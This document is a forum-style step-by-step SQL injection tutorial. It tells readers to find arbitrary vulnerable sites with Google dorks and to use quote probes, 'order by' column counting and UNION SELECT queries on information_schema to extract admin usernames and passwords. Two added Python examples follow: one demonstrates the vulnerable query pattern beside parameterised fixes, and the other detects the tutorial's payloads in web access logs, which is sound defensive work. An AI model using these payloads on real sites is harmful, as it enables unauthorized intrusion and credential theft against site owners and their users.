
Hello guys, I will teach you step-by-step how to get the admin user/pass and other info from a website using simple SQL Injection.

Step1: Find a vulnerable site using a google dork.
Sample Dork:
inurl:index.php?id=
inurl:readnews.php?ID=
inurl:trainers.php?id=
Ex: http://www.site.com/index.php?id=1

Step2: Add a (') to the end of the URL.
http://www.site.com/index.php?id=1<SQLi>
Ex: http://www.site.com/index.php?id=1'
(Note: If the page comes out with an SQL error, that means the site is vulnerable to SQLi. If it loads normally, move to the next target site.)
Typical Error:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():

Step3: Find the number of columns.
http://www.site.com/index.php?id=1 order by 5-- (Error)
Formula: # of columns = 1stErrorPage - 1
So if we use the formula, # of columns = 5 - 1 = "4 # of columns"
Ex: http://www.site.com/index.php?id=1 order by 4--
Typical Error: Unknown column '<#>' in 'order clause'

Step4: Add a UNION SELECT statement to the URL and a '-' after the equal '=' sign. We only have 4 columns, so the output comes with this:
Ex: http://www.site.com/index.php?id=1 union select 1,2,3,4--

Step5: Find the SQL version.
Command: version() or @@version
Ex: http://www.site.com/index.php?id=1 union select 1,version(),3,4--
(Note: If the SQL version is equal to or greater than 5, e.g. '5.1.66-0', that means the site is vulnerable. If the version is 4 or lower, move to the next target site.)

Step6: Get the tables.
Ex: http://www.site.com/index.php?id=1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--
Sample Result: category,employee,product,users

Step7: Now find 'user/s', 'admin', etc. If we find users, get the users columns. But before that, convert 'users' to hex: go to Text to Hex Converter Online http://www.swingnote.com/tools/texttohex.php
users = 7573657273 (hex)
Insert this in table_name=0x<hex>
http://www.site.com/index.php?id=1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x<hex>--
Ex: http://www.site.com/index.php?id=1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x7573657273--
Sample Result: password,userID,username

Step8: Extract information.
Optional: Add 0x3a; 0x3a is the hexadecimal value for ':'
Ex: http://www.site.com/index.php?id=1 union select 1,group_concat(username,0x3a,password),3,4 from users--

Happy Hunting ^_^
~PHC_Ast3Risk
~Stawhat-Chopper
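Every step above works only because the site builds its query by pasting the id parameter straight into the SQL text. The following added example (not part of the original tutorial, and not the code of any site it mentions) reproduces that pattern against a constructed in-memory SQLite database with made-up product and users rows, and puts the hardened version next to it: the value is bound as a parameter and type-checked, and the database error text is no longer shown to the client. The table layout, row values and function names are assumptions made for the demonstration.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the tutorial's back end: a product table behind
    index.php?id= and the users table the UNION payload ends up reading."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (id INTEGER, name TEXT, price REAL, stock INTEGER);
        INSERT INTO product VALUES (1, 'widget', 9.99, 10);
        INSERT INTO product VALUES (2, 'gadget', 19.99, 3);
        CREATE TABLE users (userID INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'example-hash-placeholder');
    """)
    return conn


def lookup_vulnerable(conn, id_param):
    """The bug behind the whole tutorial: the request value becomes part of the
    SQL text, so a stray quote breaks the statement (Step2) and 'order by' /
    'union select' are executed as SQL (Steps 3-8)."""
    sql = "SELECT id, name, price, stock FROM product WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def lookup_bound_only(conn, id_param):
    """Binding alone is enough to stop the injection: the whole request value is
    compared with the id column as data, so a payload simply matches no row."""
    sql = "SELECT id, name, price, stock FROM product WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


def lookup_safe(conn, id_param):
    """Hardened version: validate the type the page expects, then bind it."""
    try:
        id_value = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    sql = "SELECT id, name, price, stock FROM product WHERE id=?"
    return conn.execute(sql, (id_value,)).fetchall()


def page_response(conn, id_param, handler, verbose_errors):
    """Simulates the HTTP answer. verbose_errors=True reproduces the 'Typical
    Error' leak from Step2 (the database message reaches the client); a
    hardened page logs the detail server-side and returns a generic message."""
    try:
        return {"status": 200, "rows": handler(conn, id_param)}
    except sqlite3.Error as exc:
        # A real application would write str(exc) to its own log here.
        detail = str(exc) if verbose_errors else "internal error"
        return {"status": 500, "error": detail}
    except ValueError:
        return {"status": 400, "error": "bad request"}


if __name__ == "__main__":
    db = build_db()
    probe = "1'"
    payload = "1 union select 1,username,3,4 from users--"
    print("vulnerable, quote probe :", page_response(db, probe, lookup_vulnerable, True))
    print("vulnerable, union       :", page_response(db, payload, lookup_vulnerable, True))
    print("bound only, union       :", page_response(db, payload, lookup_bound_only, False))
    print("safe, union             :", page_response(db, payload, lookup_safe, False))
```

Running it shows the vulnerable handler returning the admin row alongside the product row for the UNION payload and leaking the parser error for the quote probe, while the bound query returns no rows and the type-checked one rejects the request before it reaches the database.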
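Each step of the walkthrough leaves a distinctive trace in the web server's access log: a trailing quote, an order by N probe, union select, version(), information_schema and 0x hex literals. The added example below (not from the original tutorial) parses constructed Apache-style log lines, URL-decodes the query string and flags requests that carry those indicators, grouping hits per client so the step-by-step progression from one address stands out. The log lines, addresses and indicator names are all made up for the demonstration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Indicators taken from the tutorial's own payloads, matched against the
# decoded, lower-cased query string.
INDICATORS = {
    "quote-probe": re.compile(r"=\s*-?\d+'"),                 # Step2: id=1'
    "order-by-enum": re.compile(r"\border\s+by\s+\d+"),        # Step3: column count
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),  # Step4 onward
    "version-fn": re.compile(r"\bversion\s*\(|@@version"),     # Step5
    "schema-read": re.compile(r"\binformation_schema\."),      # Steps 6-7
    "hex-literal": re.compile(r"\b0x[0-9a-f]+\b"),             # 0x7573657273, 0x3a
    "group-concat": re.compile(r"\bgroup_concat\s*\("),
    "comment-tail": re.compile(r"--\s*$|#\s*$"),               # trailing -- terminator
}

# Apache combined/common log prefix: client, identity, user, timestamp, request, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one client walking through the tutorial, one normal visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1%27 HTTP/1.1" 200 812
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=1+order+by+5-- HTTP/1.1" 200 812
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?id=1+union+select+1,version(),3,4-- HTTP/1.1" 200 5200
203.0.113.5 - - [10/Oct/2023:13:57:01 +0000] "GET /index.php?id=1+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x7573657273-- HTTP/1.1" 200 5300
198.51.100.7 - - [10/Oct/2023:14:01:15 +0000] "GET /readnews.php?ID=42 HTTP/1.1" 200 4100
"""


def analyse_line(line):
    """Parse one access-log line; return a record with the indicators that
    matched its decoded query string, or None if the line is not parseable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    # Decode once so %27 and '+' encoded payloads match the plain-text patterns.
    query = unquote_plus(parts.query).lower()
    hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "query": query, "status": m.group("status"), "indicators": hits}


def suspicious_requests(log_text, min_hits=1):
    """Return the parsed records that carry at least min_hits indicators."""
    flagged = []
    for line in log_text.splitlines():
        rec = analyse_line(line)
        if rec and len(rec["indicators"]) >= min_hits:
            flagged.append(rec)
    return flagged


def by_source(flagged):
    """Group indicator names per client address, in the order they were seen,
    so the quote probe -> order by -> union select -> schema read sequence is visible."""
    summary = {}
    for rec in flagged:
        summary.setdefault(rec["ip"], []).extend(rec["indicators"])
    return summary


if __name__ == "__main__":
    hits = suspicious_requests(SAMPLE_LOG)
    for rec in hits:
        print(rec["ip"], rec["ts"], rec["path"], rec["indicators"])
    print(by_source(hits))
```

Raising min_hits to 2 drops the lone quote probe and keeps only the requests that combine an SQL keyword with a comment terminator or a schema read, which is a useful threshold for noisy sites; the per-client summary is what an analyst would pivot on when deciding whether the sequence is a scanner or a hands-on attempt.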
